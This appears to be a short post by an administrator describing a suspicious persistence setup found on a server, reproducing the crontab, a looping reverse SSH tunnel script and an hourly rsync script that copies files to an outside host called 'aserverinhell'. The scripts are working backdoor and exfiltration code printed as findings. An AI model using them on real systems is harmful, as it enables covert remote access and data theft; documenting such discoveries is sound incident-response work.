reverse tunnel transfer to aserverinhell

nasty satan.

 today i was looking at some odd behavior on a server.  
 and look what i found... a reverse tunnel and data syncs every hour.  
   
 satan 8287 0.0 0.0 10840  584 ?    S   2014  0:01 /bin/bash ./tun1  
 satan 17363 0.0 0.0 40896 2652 ?    S  10:33  0:00 ssh -c arcfour,blowfish-cbc -R 8000:localhost:22 -i /home/satan/stairwaytoheaven/  
   
 i decided to check and see if satan has a scheduled task. he does.  
   
 crontab -l -u satan  
   
 @hourly bash -c "cd /home/satan/stairwaytoheaven; get pull >> stairwaytoheaven.log 2>> stairwaytoheaven.err && ./hellSync.sh"  
 @monthly bash -c "cd /home/satan/stairwaytoheaven; rm stairwaytoheaven.err; rm stairwaytoheaven.log"  
   
 crontab                    a copy of the above   
 stairwaytoheaven.err          a file with errors resultant from stairwaytoheaven.sh  
 stairwaytoheaven.log          a log of what's going on  
 manifest               a list of files generated from get pull command  
 satan.pem               satan's key  
 stairwaytoheaven.sh          rsync job going over a reverse tunnel to aserverinhell  
   
 tun1  
 #!/bin/bash  
 sleep 2  
 while true; do  
 echo Starting connection 1 on `date`  
 ssh -c arcfour,blowfish-cbc -R 8000:localhost:22 -i /home/satan/stairwaytoheaven/satan.pem lucifer@aserverinhell -N  
 echo Connection 1 died on `date`  
 sleep 15  
 done  
   
 hellSync.sh  
 #!/bin/bash  
 chmod 600 /home/satan/stairwaytoheaven/satan.pem  
 echo -n "--- START " >> stairwaytoheaven.log 2>> stairwaytoheaven.err < /dev/null  
 date >> stairwaytoheaven.log 2>> stairwaytoheaven.err < /dev/null  
 rsync -avz -r --recursive --delete --files-from=./manifest -e "ssh -i /home/satan/stairwaytoheaven/satan.pem" / lucifer@aserverinhell:/ >> stairwaytoheaven.log 2>> stairwaytoheaven.err < /dev/null  
 echo "--- END" >> stairwaytoheaven.log 2>> stairwaytoheaven.err < /dev/null